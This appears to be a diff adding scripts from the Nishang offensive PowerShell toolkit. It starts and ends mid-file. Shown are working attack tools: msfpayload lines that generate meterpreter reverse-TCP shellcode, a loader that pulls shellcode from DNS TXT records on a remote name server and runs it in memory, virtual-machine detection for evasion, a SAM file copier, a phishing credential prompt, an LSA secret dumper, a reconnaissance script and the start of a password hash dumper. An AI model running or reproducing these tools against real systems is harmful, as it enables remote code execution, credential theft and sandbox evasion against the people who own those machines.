./msfpayload windows/meterpreter/reverse_tcp LHOST= EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST= EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'
.PARAMETER shellcode32
The domain (or subdomain) whose TXT records would hold 32-bit shellcode.
.PARAMETER shellcode64
The domain (or subdomain) whose TXT records would hold 64-bit shellcode.
.PARAMETER AUTHNS
Authoritative Name Server for the domains.
.EXAMPLE
PS > Execute-DNSTXT-Code
The payload will ask for all required options.
.EXAMPLE
PS > Execute-DNSTXT-Code 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com
Use above from non-interactive shell.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
.NOTES
The code execution logic is based on this post by Matt.
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
#>
function Execute-DNSTXT-Code
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ShellCode32,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$ShellCode64,
[Parameter(Position = 2, Mandatory = $True)]
[String]
$AuthNS
)
$code = (Invoke-Expression "nslookup -querytype=txt $shellcode32 $AuthNS")
$tmp = $code | select-string -pattern "`""
$tmp1 = $tmp -split("`"")[0]
[string]$shell = $tmp1 -replace "`t", ""
$shell = $shell.replace(" ", "")
[Byte[]]$sc32 = $shell -split ','
$code64 = (Invoke-Expression "nslookup -querytype=txt $shellcode64 $AuthNS")
$tmp64 = $code64 | select-string -pattern "`""
$tmp164 = $tmp64 -split("`"")[0]
[string]$shell64 = $tmp164 -replace "`t", ""
$shell64 = $shell64.replace(" ", "")
[Byte[]]$sc64 = $shell64 -split ','
$code = @'
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
'@
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
[Byte[]]$sc = $sc32
if ([IntPtr]::Size -eq 8) {$sc = $sc64}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)
while(1)
{
start-sleep -Seconds 100
}
}

302
aspx/nishang/Gather/Check-VM.ps1 Normal file
View file

@ -0,0 +1,302 @@
<#
.SYNOPSIS
Nishang script which detects whether it is in a known virtual machine.
.DESCRIPTION
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
Xen and QEMU for detecting the environment.
.EXAMPLE
PS > Check-VM
.LINK
http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
https://github.com/samratashok/nishang
.NOTES
The script draws heavily from checkvm.rb post module from msf.
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
#>
function Check-VM
{
[CmdletBinding()] Param()
$ErrorActionPreference = "SilentlyContinue"
#Hyper-V
$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
{
$hypervm = $true
}
if (!$hypervm)
{
$hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($hyperv -match "vrtual")
{
$hypervm = $true
}
}
if (!$hypervm)
{
$hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
{
$hypervm = $true
}
}
if ($hypervm)
{
"This is a Hyper-V machine."
}
#VMWARE
$vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
{
$vmwarevm = $true
}
if (!$vmwarevm)
{
$vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
if ($vmware -match "vmware")
{
$vmwarevm = $true
}
}
if (!$vmwarevm)
{
$vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($vmware -match "vmware")
{
$vmwarevm = $true
}
}
if (!$vmwarevm)
{
$vmware = Get-Process
if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
{
$vmwarevm = $true
}
}
if ($vmwarevm)
{
"This is a VMWare machine."
}
#Virtual PC
$vpc = Get-Process
if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
{
$vpcvm = $true
}
if (!$vpcvm)
{
$vpc = Get-Process
if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
{
$vpcvm = $true
}
}
if (!$vpcvm)
{
$vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
{
$vpcvm = $true
}
}
if ($vpcvm)
{
"This is a Virtual PC."
}
#Virtual Box
$vb = Get-Process
if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
{
$vbvm = $true
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($vb -match "vbox_")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($vb -match "vbox_")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($vb -match "vbox")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
if ($vb -match "vbox")
{
$vbvm = $true
}
}
if (!$vbvm)
{
$vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
{
$vbvm = $true
}
}
if ($vbvm)
{
"This is a Virtual Box."
}
#Xen
$xen = Get-Process
if ($xen -eq "xenservice.exe")
{
$xenvm = $true
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
if ($xen -match "xen")
{
$xenvm = $true
}
}
if (!$xenvm)
{
$xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
{
$xenvm = $true
}
}
if ($xenvm)
{
"This is a Xen Machine."
}
#QEMU
$qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
if ($qemu -match "qemu")
{
$qemuvm = $true
}
if (!$qemuvm)
{
$qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
if ($qemu -match "qemu")
{
$qemuvm = $true
}
}
if ($qemuvm)
{
"This is a Qemu machine."
}
}

57
aspx/nishang/Gather/Copy-VSS.ps1 Normal file
View file

@ -0,0 +1,57 @@
<#
.SYNOPSIS
Nishang Payload which copies the SAM file.
.DESCRIPTION
This payload uses the VSS service (starts it if not running), creates a shadow of C:
and copies the SAM file which could be used to dump password hashes from it. This must be run from an elevated shell.
.PARAMETER PATH
The path where SAM file would be saved. The folder must exist already.
.EXAMPLE
PS > Copy-VSS
Saves the SAM file in current run location of the payload.
.Example
PS > Copy-VSS -path C:\temp
.LINK
http://www.canhazcode.com/index.php?a=4
https://github.com/samratashok/nishang
.NOTES
Code by @al14s
#>
function Copy-VSS
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Path
)
$service = (Get-Service -name VSS)
if($service.Status -ne "Running")
{
$notrunning=1
$service.Start()
}
$id = (gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume = (gwmi win32_shadowcopy -filter "ID='$id'")
$filepath = "$pwd\SAM"
if ($path)
{
$filepath = "$path\SAM"
}
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $filepath`
$volume.Delete()
if($notrunning -eq 1)
{
$service.Stop()
}
}

49
aspx/nishang/Gather/Credentials.ps1 Normal file
View file

@ -0,0 +1,49 @@
<#
.SYNOPSIS
Nishang Payload which opens a user credential prompt.
.DESCRIPTION
This payload opens a prompt which asks for user credentials and
does not go away till valid credentials are entered in the prompt.
The credentials can then exfiltrated using method of choice.
.EXAMPLE
PS > Credentials
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Credentials
{
[CmdletBinding()]
Param ()
$ErrorActionPreference="SilentlyContinue"
Add-Type -assemblyname system.DirectoryServices.accountmanagement
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
$domainDN = "LDAP://" + ([ADSI]"").distinguishedName
while($true)
{
$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
if($credential)
{
$creds = $credential.GetNetworkCredential()
[String]$user = $creds.username
[String]$pass = $creds.password
[String]$domain = $creds.domain
$authlocal = $DS.ValidateCredentials($user, $pass)
$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
{
$output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
$output
break
}
}
}
}

67
aspx/nishang/Gather/FireBuster.ps1 Normal file
View file

@ -0,0 +1,67 @@
<#
.SYNOPSIS
This script is part of Nishang. FireBuster is a PowerShell script that does egress testing. It is to be run on the target machine.
.DESCRIPTION
FireBuster sends packets to FireListener, which hosts a listening server. By default, FireBuster sends packets to all ports (which could be VERY slow).
.EXAMPLE
PS> FireBuster 10.10.10.10 1000-1020
.EXAMPLE
PS> FireBuster 10.10.10.10 1000-1020 -Verbose
Use above for increased verbosity.
.LINK
http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
https://github.com/samratashok/nishang
http://roo7break.co.uk
.NOTES
Major part of the script is written by Nikhil ShreeKumar (@roo7break)
#>
function FireBuster{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$targetip = $(throw "Please specify an EndPoint (Host or IP Address)"),
[Parameter(Position = 1, Mandatory = $False)]
[String] $portrange = "1-65535"
)
$ErrorActionPreference = 'SilentlyContinue'
[int] $lowport = $portrange.split("-")[0]
[int] $highport = $portrange.split("-")[1]
$hostaddr = [system.net.IPAddress]::Parse($targetip)
Write-Verbose "Trying to connect to $hostaddr from $lowport to $highport"
[int] $ports = 0
Write-Host "Sending...."
for($ports=$lowport; $ports -le $highport ; $ports++){
try{
Write-Verbose "Trying port $ports"
$client = New-Object System.Net.Sockets.TcpClient
$beginConnect = $client.BeginConnect($hostaddr,$ports,$null,$null)
$TimeOut = 300
if($client.Connected)
{
Write-Host "Connected to port $ports" -ForegroundColor Green
}
else
{
Start-Sleep -Milli $TimeOut
if($client.Connected)
{
Write-Host "Connected to port $ports" -ForegroundColor Green
}
}
$client.Close()
}catch { Write-Error $Error[0]}
}
Write-Host "Data sent to all ports"
}

95
aspx/nishang/Gather/FireListener.ps1 Normal file
View file

@ -0,0 +1,95 @@
<#
.SYNOPSIS
This script is part of Nishang. FireListener is a PowerShell script that does egress testing. It is to be run on the attacking/listening machine.
.DESCRIPTION
FireListener hosts a listening server to which FireBuster can send packets to. Firebuster is to be run on the target machine which is to
be tested for egress filtering.
.EXAMPLE
PS > FireListener -portrange 1000-1020
.LINK
http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
https://github.com/samratashok/nishang
http://roo7break.co.uk
.NOTES
Based on the script written by Nikhil ShreeKumar (@roo7break)
#>
function FireListener
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$PortRange
)
$ErrorActionPreference = 'SilentlyContinue'
#Code which opens a socket for each port
$socketblock = {
param($port = $args[1])
try
{
$EndPoint = New-Object System.Net.IPEndPoint([ipaddress]::any, $port)
$ListenSocket = New-Object System.Net.Sockets.TCPListener $EndPoint
$ListenSocket.Start()
$RecData = $ListenSocket.AcceptTCPClient()
$clientip = $RecData.Client.RemoteEndPoint.Address.ToString()
$clientport = $RecData.Client.LocalEndPoint.Port.ToString()
Write-Host "$clientip connected through port $clientport" -ForegroundColor Green
$Stream.Close()
$ListenSocket.Stop()
} catch
{ Write-Error $Error[0] }
}
[int] $lowport = $portrange.split("-")[0]
[int] $highport = $portrange.split("-")[1]
[int] $ports = 0
Get-Job | Remove-Job
#Start a job for each port
for($ports=$lowport; $ports -le $highport; $ports++)
{
"Listening on port $ports"
$job = start-job -ScriptBlock $socketblock -ArgumentList $ports -Name $ports
}
[console]::TreatControlCAsInput = $true
while ($true)
{
# code from http://poshcode.org/542 to capture Ctrl+C
# start code snip
if ($Host.UI.RawUI.KeyAvailable -and (3 -eq [int]$Host.UI.RawUI.ReadKey("AllowCtrlC,IncludeKeyUp,NoEcho").Character))
{
Write-Host "Stopping all jobs.....This can take many minutes." -Background DarkRed
Sleep 2
Get-Job | Stop-Job
Get-Job | Remove-Job
#Stop-Process -Id $PID
break;
}
# end code snip
#Start a new job which listens on the same port for every completed job.
foreach ($job1 in (Get-Job))
{
Start-Sleep -Seconds 4
Get-Job | Receive-Job
if ($job1.State -eq "Completed")
{
$port = $job1.Name
"Listening on port $port"
$newjobs = start-job -ScriptBlock $socketblock -ArgumentList $port -Name $port
Get-Job | Remove-Job
}
}
}
}

62
aspx/nishang/Gather/Get-Information.ps1 Normal file
View file

@ -0,0 +1,62 @@
<#
.SYNOPSIS
Nishang Payload which gathers juicy information from the target.
.DESCRIPTION
This payload extracts information form registry and some commands.
The information available would be dependent on the privilege with
which the script would be executed.
.EXAMPLE
PS > Get-Information
Use above to execute the function.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Get-Information
{
[CmdletBinding()]
Param ()
function registry_values($regkey, $regvalue,$child)
{
if ($child -eq "no"){$key = get-item $regkey}
else{$key = get-childitem $regkey}
$key |
ForEach-Object {
$values = Get-ItemProperty $_.PSPath
ForEach ($value in $_.Property)
{
if ($regvalue -eq "all") {$values.$value}
elseif ($regvalue -eq "allname"){$value}
else {$values.$regvalue;break}
}}}
$output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n")
$output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname") -join "`r`n")
$output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname") -join "`r`n")
$output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all") -join "`r`n")
$output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no") -join "`r`n")
$output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n")
$output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n")
$output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts") -join "`r`n")
$output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n")
$output = $output + "`n`n Account Policy:`n" + ((net accounts) -join "`r`n")
$output = $output + "`n`n Local users:`n" + ((net user) -join "`r`n")
$output = $output + "`n`n Local Groups:`n" + ((net localgroup) -join "`r`n")
$output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all) -join "`r`n")
$output
}

263
aspx/nishang/Gather/Get-LSASecret.ps1 Normal file
View file

@ -0,0 +1,263 @@
<#
.SYNOPSIS
Nishang payload which extracts LSA Secrets from local computer.
.DESCRIPTION
Extracts LSA secrets from HKLM:\\SECURITY\Policy\Secrets\ on a local computer.
The payload must be run with elevated permissions, in 32-bit mode and requires
permissions to the security key in HKLM. The permission could be obtained by using
Enable-DuplicateToken payload.
.PARAMETER RegistryKey
Name of Key to Extract. if the parameter is not used, all secrets will be displayed.
.EXAMPLE
PS > Get-LsaSecret
.EXAMPLE
PS > Get-LsaSecret -Key KeyName
Read contents of the key mentioned as parameter.
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/06/use-powershell-to-decrypt-lsa-secrets-from-the-registry.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Get-LsaSecret {
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory=$False)]
[String]
$RegistryKey
)
Begin {
# Check if User is Elevated
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true) {
Write-Warning "Run the Command as an Administrator"
Break
}
# Check if Script is run in a 32-bit Environment by checking a Pointer Size
if([System.IntPtr]::Size -eq 8) {
Write-Warning "Run PowerShell in 32-bit mode"
Break
}
# Check if RegKey is specified
if([string]::IsNullOrEmpty($registryKey)) {
[string[]]$registryKey = (Split-Path (Get-ChildItem HKLM:\SECURITY\Policy\Secrets | Select -ExpandProperty Name) -Leaf)
}
# Create Temporary Registry Key
if( -not(Test-Path "HKLM:\\SECURITY\Policy\Secrets\MySecret")) {
mkdir "HKLM:\\SECURITY\Policy\Secrets\MySecret" | Out-Null
}
$signature = @"
[StructLayout(LayoutKind.Sequential)]
public struct LSA_UNICODE_STRING
{
public UInt16 Length;
public UInt16 MaximumLength;
public IntPtr Buffer;
}
[StructLayout(LayoutKind.Sequential)]
public struct LSA_OBJECT_ATTRIBUTES
{
public int Length;
public IntPtr RootDirectory;
public LSA_UNICODE_STRING ObjectName;
public uint Attributes;
public IntPtr SecurityDescriptor;
public IntPtr SecurityQualityOfService;
}
public enum LSA_AccessPolicy : long
{
POLICY_VIEW_LOCAL_INFORMATION = 0x00000001L,
POLICY_VIEW_AUDIT_INFORMATION = 0x00000002L,
POLICY_GET_PRIVATE_INFORMATION = 0x00000004L,
POLICY_TRUST_ADMIN = 0x00000008L,
POLICY_CREATE_ACCOUNT = 0x00000010L,
POLICY_CREATE_SECRET = 0x00000020L,
POLICY_CREATE_PRIVILEGE = 0x00000040L,
POLICY_SET_DEFAULT_QUOTA_LIMITS = 0x00000080L,
POLICY_SET_AUDIT_REQUIREMENTS = 0x00000100L,
POLICY_AUDIT_LOG_ADMIN = 0x00000200L,
POLICY_SERVER_ADMIN = 0x00000400L,
POLICY_LOOKUP_NAMES = 0x00000800L,
POLICY_NOTIFICATION = 0x00001000L
}
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaRetrievePrivateData(
IntPtr PolicyHandle,
ref LSA_UNICODE_STRING KeyName,
out IntPtr PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaStorePrivateData(
IntPtr policyHandle,
ref LSA_UNICODE_STRING KeyName,
ref LSA_UNICODE_STRING PrivateData
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaOpenPolicy(
ref LSA_UNICODE_STRING SystemName,
ref LSA_OBJECT_ATTRIBUTES ObjectAttributes,
uint DesiredAccess,
out IntPtr PolicyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaNtStatusToWinError(
uint status
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaClose(
IntPtr policyHandle
);
[DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
public static extern uint LsaFreeMemory(
IntPtr buffer
);
"@
Add-Type -MemberDefinition $signature -Name LSAUtil -Namespace LSAUtil
}
Process{
foreach($key in $RegistryKey) {
$regPath = "HKLM:\\SECURITY\Policy\Secrets\" + $key
$tempRegPath = "HKLM:\\SECURITY\Policy\Secrets\MySecret"
$myKey = "MySecret"
if(Test-Path $regPath) {
Try {
Get-ChildItem $regPath -ErrorAction Stop | Out-Null
}
Catch {
Write-Error -Message "Access to registry Denied, run as NT AUTHORITY\SYSTEM" -Category PermissionDenied
Break
}
if(Test-Path $regPath) {
# Copy Key
"CurrVal","OldVal","OupdTime","CupdTime","SecDesc" | ForEach-Object {
$copyFrom = "HKLM:\SECURITY\Policy\Secrets\" + $key + "\" + $_
$copyTo = "HKLM:\SECURITY\Policy\Secrets\MySecret\" + $_
if( -not(Test-Path $copyTo) ) {
mkdir $copyTo | Out-Null
}
$item = Get-ItemProperty $copyFrom
Set-ItemProperty -Path $copyTo -Name '(default)' -Value $item.'(default)'
}
}
$Script:pastevalue
# Attributes
$objectAttributes = New-Object LSAUtil.LSAUtil+LSA_OBJECT_ATTRIBUTES
$objectAttributes.Length = 0
$objectAttributes.RootDirectory = [IntPtr]::Zero
$objectAttributes.Attributes = 0
$objectAttributes.SecurityDescriptor = [IntPtr]::Zero
$objectAttributes.SecurityQualityOfService = [IntPtr]::Zero
# localSystem
$localsystem = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
$localsystem.Buffer = [IntPtr]::Zero
$localsystem.Length = 0
$localsystem.MaximumLength = 0
# Secret Name
$secretName = New-Object LSAUtil.LSAUtil+LSA_UNICODE_STRING
$secretName.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($myKey)
$secretName.Length = [Uint16]($myKey.Length * [System.Text.UnicodeEncoding]::CharSize)
$secretName.MaximumLength = [Uint16](($myKey.Length + 1) * [System.Text.UnicodeEncoding]::CharSize)
# Get LSA PolicyHandle
$lsaPolicyHandle = [IntPtr]::Zero
[LSAUtil.LSAUtil+LSA_AccessPolicy]$access = [LSAUtil.LSAUtil+LSA_AccessPolicy]::POLICY_GET_PRIVATE_INFORMATION
$lsaOpenPolicyHandle = [LSAUtil.LSAUtil]::LSAOpenPolicy([ref]$localSystem, [ref]$objectAttributes, $access, [ref]$lsaPolicyHandle)
if($lsaOpenPolicyHandle -ne 0) {
Write-Warning "lsaOpenPolicyHandle Windows Error Code: $lsaOpenPolicyHandle"
Continue
}
# Retrieve Private Data
$privateData = [IntPtr]::Zero
$ntsResult = [LSAUtil.LSAUtil]::LsaRetrievePrivateData($lsaPolicyHandle, [ref]$secretName, [ref]$privateData)
$lsaClose = [LSAUtil.LSAUtil]::LsaClose($lsaPolicyHandle)
$lsaNtStatusToWinError = [LSAUtil.LSAUtil]::LsaNtStatusToWinError($ntsResult)
if($lsaNtStatusToWinError -ne 0) {
Write-Warning "lsaNtsStatusToWinError: $lsaNtStatusToWinError"
}
[LSAUtil.LSAUtil+LSA_UNICODE_STRING]$lusSecretData =
[LSAUtil.LSAUtil+LSA_UNICODE_STRING][System.Runtime.InteropServices.marshal]::PtrToStructure($privateData, [LSAUtil.LSAUtil+LSA_UNICODE_STRING])
Try {
[string]$value = [System.Runtime.InteropServices.marshal]::PtrToStringAuto($lusSecretData.Buffer)
$value = $value.SubString(0, ($lusSecretData.Length / 2))
}
Catch {
$value = ""
}
if($key -match "^_SC_") {
# Get Service Account
$serviceName = $key -Replace "^_SC_"
Try {
# Get Service Account
$service = Get-WmiObject -Query "SELECT StartName FROM Win32_Service WHERE Name = '$serviceName'" -ErrorAction Stop
$account = $service.StartName
}
Catch {
$account = ""
}
} else {
$account = ""
}
# Return Object
$obj = New-Object PSObject -Property @{
Name = $key;
Secret = $value;
Account = $Account
}
$obj | Select-Object Name, Account, Secret, @{Name="ComputerName";Expression={$env:COMPUTERNAME}}
}
else {
Write-Error -Message "Path not found: $regPath" -Category ObjectNotFound
}
}
}
end {
if(Test-Path $tempRegPath) {
Remove-Item -Path "HKLM:\\SECURITY\Policy\Secrets\MySecret" -Recurse -Force
}
}
}

400
aspx/nishang/Gather/Get-PassHashes.ps1 Normal file
View file

@ -0,0 +1,400 @@
<#
.SYNOPSIS
Nishang payload which dumps password hashes.
.DESCRIPTION
The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script
(but not SYSTEM privs as for the original powerdump)
.EXAMPLE
PS > Get-PassHashes
.LINK
http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
https://github.com/samratashok/nishang
#>
function Get-PassHashes {
[CmdletBinding()]
Param ()
#######################################powerdump written by David Kennedy#########################################
function LoadApi
{
$oldErrorAction = $global:ErrorActionPreference;
$global:ErrorActionPreference = "SilentlyContinue";
$test = [PowerDump.Native];
$global:ErrorActionPreference = $oldErrorAction;
if ($test)
{
# already loaded
return;
}
$code = @'
using System;
using System.Security.Cryptography;
using System.Runtime.InteropServices;
using System.Text;
namespace PowerDump
{
public class Native
{
[DllImport("advapi32.dll", CharSet = CharSet.Auto)]
public static extern int RegOpenKeyEx(
int hKey,
string subKey,
int ulOptions,
int samDesired,
out int hkResult);
[DllImport("advapi32.dll", EntryPoint = "RegEnumKeyEx")]
extern public static int RegEnumKeyEx(
int hkey,
int index,
StringBuilder lpName,
ref int lpcbName,
int reserved,
StringBuilder lpClass,
ref int lpcbClass,
out long lpftLastWriteTime);
[DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
extern public static int RegQueryInfoKey(
int hkey,
StringBuilder lpClass,
ref int lpcbClass,
int lpReserved,
out int lpcSubKeys,
out int lpcbMaxSubKeyLen,
out int lpcbMaxClassLen,
out int lpcValues,
out int lpcbMaxValueNameLen,
out int lpcbMaxValueLen,
out int lpcbSecurityDescriptor,
IntPtr lpftLastWriteTime);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern int RegCloseKey(
int hKey);
}
} // end namespace PowerDump
public class Shift {
public static int Right(int x, int count) { return x >> count; }
public static uint Right(uint x, int count) { return x >> count; }
public static long Right(long x, int count) { return x >> count; }
public static ulong Right(ulong x, int count) { return x >> count; }
public static int Left(int x, int count) { return x << count; }
public static uint Left(uint x, int count) { return x << count; }
public static long Left(long x, int count) { return x << count; }
public static ulong Left(ulong x, int count) { return x << count; }
}
'@
$provider = New-Object Microsoft.CSharp.CSharpCodeProvider
$dllName = [PsObject].Assembly.Location
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$assemblies = @("System.dll", $dllName)
$compilerParameters.ReferencedAssemblies.AddRange($assemblies)
$compilerParameters.GenerateInMemory = $true
$compilerResults = $provider.CompileAssemblyFromSource($compilerParameters, $code)
if($compilerResults.Errors.Count -gt 0) {
$compilerResults.Errors | % { Write-Error ("{0}:`t{1}" -f $_.Line,$_.ErrorText) }
}
}
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
$odd_parity = @(
